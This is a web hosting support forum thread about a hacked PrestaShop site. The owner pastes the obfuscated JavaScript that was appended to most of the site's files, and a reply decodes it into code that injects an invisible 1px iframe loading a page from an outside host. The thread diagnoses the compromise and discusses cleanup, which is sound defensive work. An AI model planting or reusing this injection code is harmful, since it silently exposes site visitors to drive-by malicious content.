Site problem

[alexmbra]

Hi.

 

I am having this problem with my prestashop site ( http://alexsite.t15....ta151/index.php )

 

Nothing shows up when I enter on that link. And when I enter on the admin area, the following error message appear:

• blockmyaccountfooter (parse error in /modules/blockmyaccountfooter/blockmyaccountfooter.php)
  
• blockmyaccountfooter (class missing in /modules/blockmyaccountfooter/blockmyaccountfooter.php)
  

And when I try to see all my modules ( default ones that comes with Prestashop ), the site stays loading forever.

 

Well, this is only happening now, after my the module that I am selling on prestashop store became online. But this has nothing to do with my module.

And I also reinstalled everything, and it was working for a few days, until today. This is the second time I am having this problem. I am starting to think that some other seller is hacking my site.

 

EDITED: After looking at my files on the server and looking at the server, I can that some files were modified today. Comparing them with the original files, almost all of them have this at the end now:

 

 

#fff309#

echo " <script type=\"text/javascript\" language=\"javascript\" > try{if(window.document)window[\"document\"][\"body\"]=\"vasasf\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];[spam-filter]n=[\"1f\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"1f\",\"1g\",\"17\",\"4n\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4i\",\"3m\",\"4e\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"d\",\"a\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4e\",\"3o\",\"17\",\"2b\",\"17\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4j\",\"4j\",\"4j\",\"1l\",\"3n\",\"43\",\"4f\",\"4g\",\"3m\",\"47\",\"45\",\"4a\",\"43\",\"1l\",\"3o\",\"4b\",\"49\",\"1m\",\"3k\",\"4i\",\"4g\",\"45\",\"3k\",\"3o\",\"4a\",\"42\",\"1m\",\"4e\",\"41\",\"48\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"2b\",\"17\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"3n\",\"4b\",\"4e\",\"40\",\"41\",\"4e\",\"17\",\"2b\",\"17\",\"1e\",\"1n\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"45\",\"42\",\"17\",\"1f\",\"18\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"2g\",\"4l\",\"2n\",\"40\",\"1f\",\"1e\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1e\",\"1g\",\"1g\",\"17\",\"4n\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"1e\",\"2a\",\"40\",\"45\",\"4i\",\"17\",\"45\",\"40\",\"2b\",\"3h\",\"1e\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"3h\",\"1e\",\"2c\",\"2a\",\"1m\",\"40\",\"45\",\"4i\",\"2c\",\"1e\",\"1g\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"2g\",\"4l\",\"2n\",\"40\",\"1f\",\"1e\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1e\",\"1g\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1g\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"50\",\"d\",\"a\",\"50\",\"1g\",\"1f\",\"1g\",\"29\"];h=2;s=\"\";if(m)for(i=0;i-503!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n,25));}z=s;if(v)ev(z)[spam-filter]}</script>";

 

#/fff309#

 

EDITED: I reinstalled everything, change my passwords, and I also searched my computer for any virus, malware,spyware, etc, but found nothing.

Anyway, for now, the site is working again: http://addons.prestashop.com/pt/slideshows-prestashop-modulo/6393-Animated-Flash-Header-Slideshow.html

Edited November 20, 2012 by alexmbra (see edit history)

[phrasespot]

I am having this problem with my prestashop site...

A sorry attempt at injecting an invisible iframe from bgstaking. com. Done wrong, breaking template. Made more readable:

 

(function () {
var ybfsg = document.createElement('iframe');

ybfsg.src = 'http://www. bgstaking. com/_vti_cnf/rel.php';
ybfsg.style.position = 'absolute';
ybfsg.style.border = '0';
ybfsg.style.height = '1px';
ybfsg.style.width = '1px';
ybfsg.style.left = '1px';
ybfsg.style.top = '1px';

if (!document.getElementById('ybfsg')) {
 document.write('<div id=\'ybfsg\'></div>');
 document.getElementById('ybfsg').appendChild(ybfsg);
}
})();

 

Get someone competent to examine your server/account if you don't know why there should be an iframe injected to pages and then this topic would be more suitable for security forum.

[Timpet]

This has hit many shops to night, and wordpress site. Sites in generel.

[Timpet]

Basicly it infecs all tpl's and js files. and header.php and index.php, perhaps some more i havent found yet.

[ang3lx]

me too, someone has news?

[phrasespot]

me too, someone has news?

What news you are expecting? There are no known PS vulnerability that can explain this. The next most probable explanation is that your server has a vulnerability and has been compromised in some way. Identify what/how of breach (optional) then clean your server.

[ang3lx]

I think that wasn't server vulnerability, but something linked to tpl/js hack. server seems clean. no file touched.

on this server there are about 40 sites, only one prestashop (version 1.4.6.2, no last version) and this is the only one that was compromised.

[phrasespot]

Other domains on the same server being fine does not mean anything. If the problem was PrestaShop, we would be seeing a lot more of it here. It can be anything from a weak FTP password to a gruntled principle to some vulnerable software installed on that domain. There is not much anyone can do here to determine what happened. Anything that needs to be done now requires server access. Get someone to check what happened and take preventive action.